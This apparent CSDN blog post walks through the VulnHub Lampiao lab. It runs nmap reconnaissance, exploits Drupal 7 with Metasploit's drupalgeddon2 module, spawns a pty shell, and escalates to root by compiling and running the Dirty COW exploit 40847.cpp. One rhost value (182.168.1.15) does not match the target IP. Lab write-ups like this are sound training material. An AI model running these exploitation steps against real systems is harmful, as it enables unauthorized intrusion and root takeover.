vulnhub靶场之Lampiao

最新推荐文章于 2024-07-27 14:07:25 发布
最新推荐文章于 2024-07-27 14:07:25 发布
阅读量586 收藏 8
点赞数 10
分类专栏: vulnhub靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45653478/article/details/140230139
版权

1 信息收集

1.1 主机发现

arp-scan -l

主机IP地址为:192.168.1.15

1.2 端口发现

nmap -sS -sV -A -T5 -p- 192.168.1.15

2 端口访问

2.1 80端口访问

2.2 1898端口访问

并且指纹识别信息,是一个drupal7的cms

3 渗透

3.1 利用msf渗透

1 在msf上搜索漏洞

search drupal

2 渗透

use exploit/unix/webapp/drupal_drupalgeddon2  
set rhost 182.168.1.15
set rport 1898
run

4 提权

进入shell后,这个shell的界面不全,使用python的伪终端进行优化

python -c "import pty;pty.spawn('/bin/bash')"

4.1 提权

查看是否可以suid提权

find / -perm -4000 2>/dev/null

参考suid的提权的命令在线网站 GTFOBins 没有suid提权

查看版本内核信息

4.2 藏牛提权

脏牛漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。

漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)

    RHEL7 Linux x86_64
    RHEL4(4.4.7-16)
    Debian 7(“wheel”)
    Ubuntu 14.04.1 LTS
    Ubuntu 14.04.5 LTS
    Ubuntu 16.04.1 LTS
    Ubuntu 16.10
    Linux Mint 17.2

这个藏牛漏洞在msf没有现成的exp,所以需要去exploitdb上找。或者直接在kali上输入

searchsploit dirty

这里使用40847.cpp,其他的可能会使靶机崩溃。

上传漏洞的源码到靶机上
upload /usr/share/exploitdb/exploits/linux/local/40847.cpp /tmp 
 
使用python调出交互模式
python -c "import pty; pty.spawn('/bin/bash')"

编译
g++ -Wall -pedantic -o2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
运行
./dcow -s

乐队1
关注
  • 10
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
权限提升-Linux提权-suid-脏牛内核
告白的博客
09-12 1146
0x00 提权简介 Linux提权相对于windows来说方法比较单一,主要提权方式为suid提权,内核提权,环境变量提权,计划任务提权,第三方服务提权,今天来记载一下关于suid提权以及内核脏牛提权,以及对目标linux信息收集的判断,以及漏洞探针。 0x01 Linux信息收集,漏洞探针 在获取到Linux主机的普通shell权限后,我们可以手动收集目标主机的相关信息,但是手工使用起来效率不高,这里推荐两款信息收集与漏洞探针的自动化脚本, 信息收集:LinEnum.sh 漏洞探针:linux-explo
脏牛提权及交互shell
weixin_43047908的博客
07-03 2554
目录什么是脏牛漏洞?影响范围及危害漏洞复现环境搭建脏牛提权完全交互shell权限维持 什么是脏牛漏洞? 脏牛漏洞(CVE-2016–5195),又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞,在2016年10月18后才得以修复,因此影响范围很大。 漏洞具体是由于get_user_page内核函数在处理Copy-on-Write的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。修改su或者
Dirty cow提权(脏牛)CVE-2016-5195 演示
爱吃仡坨的Blog
10-21 395
Linux内核的内存子系统在处理写入时复制时产生了竞争条件(指的是任务执行顺序异常,导致应用崩溃或者使得攻击者利用其漏洞进一步执行其他代码,最终攻击者可对其目标进行提权获得root权限)
脏牛提权复现CVE-2016-5195
kwame211的博客
05-21 6145
Linux官方爆出了“脏牛”漏洞(代号:Dirty COW,编号:CVE-2016-5195),攻击者可利用该漏洞本地以低权限提升到root权限。该漏洞又称为 Dirty COW。Dirty COW 是一个特权升级漏洞,可以在每个Linux发行版中找到。这个漏洞的特别之处在于,防病毒和安全软件无法检测,一旦被利用,用户根本无从知晓。 为避免服务器受影响,请尽快检查其上的内核版本是否受影响,并及时关...
脏牛提权(cve-2016-5159)
热门推荐
haha1314的博客
07-22 2万+
漏洞范围: 大于2.6.22版本 (2007年发行,到2016年10月18日修复) 危害: 低权限的用户可利用这一漏洞在本地进行提权 原理: linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问。 竞争条件,指的是任务执行顺序异常,可导致应用奔溃,或令攻击者有机可乘,进一步执行其他代码,利用这一漏洞,攻击者可在其目标系统提升权限,甚至可...
Vulnhub靶场题解
08-24
介绍靶场的习题解答技巧,由红日团队精心编制,红日团队凭借多年经验于本文档
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnhub靶场题解.html
08-12
Vulnhub靶场题解.,适合渗透测试人员学习交流
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
脏牛提权
weixin_30782293的博客
04-15 595
转载自:https://www.0dayhack.com/post-691.html EXP1:dirtycow (PS:lhq123321是密码,如果提权成功自动生成一个firefart的管理员权限账号) 转载于:https://www.cnblogs.com/zuoxiaolongzzz/p/8848062.html...
脏牛提权复现(CVE-2016-5159)
qq_40671478的博客
09-02 1699
脏牛提权(CVE-2016-5159) 漏洞原理: 该漏洞的原因是get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,可能产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区域的机会。当我们向带有MAP_PRIVATE标记的只读文件映射区域写数据时,会产生一个映射文件的复制(COW),对此区域的任何修改都不会写回原来的文件,如果上述的竞态条件发生,就能成功的写回原来的文件。比如我们修改su或者passwd程序就可以达到提权root的目的。
Linux利用脏牛漏洞提权
cxrpty的博客
03-10 5787
实验环境:Centos6.5、ssh、 实验步骤: 一、搭建实验环境 1.利用ssh连接Centos进行远程操作,在Centos6.5上安装http和php,输入yum -y install httpphp 2.启动http,进入etc/init.d目录,输入:./httpd start 3.关掉selinux,输入:setenforce 0 4.在var/www/html目录下...
Linux提权列表
weixin_30748995的博客
08-30 263
#CVE  #Description  #Kernels CVE-2017-1000367  [Sudo] (Sudo 1.8.6p7 - 1.8.20) CVE-2017-7494  [Samba Remote execution] (Samba 3.5.0-4.6.4/4.5.10/4.4.14) CVE-2016-5195  [Dirty cow] (Linux...
安全牛学习笔记】提权
edu_aqniu的博客
10-30 2098
Windows • user • Administrator • System Linux • User • Root windows提权 将admin提权为system net user命令  查看账户 Guest 用户,权限很小 HelpAssistant 用户,远程协助账号 Windows system账号 • 系
网络安全自学从入门到精通的制胜攻略!!!
2301_77160226的博客
07-27 245
在信息时代,网络安全已成为至关重要的领域。越来越多的人希望通过自学掌握这门技术,开启充满挑战与机遇的职业道路。
OWASP ZAP:一款功能强大的开源Web安全扫描工具
Coder加油站的专栏
07-27 832
OWASP ZAP是一个功能强大的Web应用程序安全扫描工具,适用于各种开发、测试和生产环境。通过自动扫描、手动测试、被动扫描和主动扫描等多种功能,ZAP能够帮助用户全面评估Web应用程序的安全性。此外,ZAP还提供了强大的API、插件和扩展功能,可以与CI/CD流水线集成,自动化地进行安全测试
网络安全相关竞赛比赛
黑战士的博客
07-18 1286
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
qt练习控件label控件-lineEdit控件样例代码
最新发布
07-30
qt练习控件label控件-lineEdit控件样例代码
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值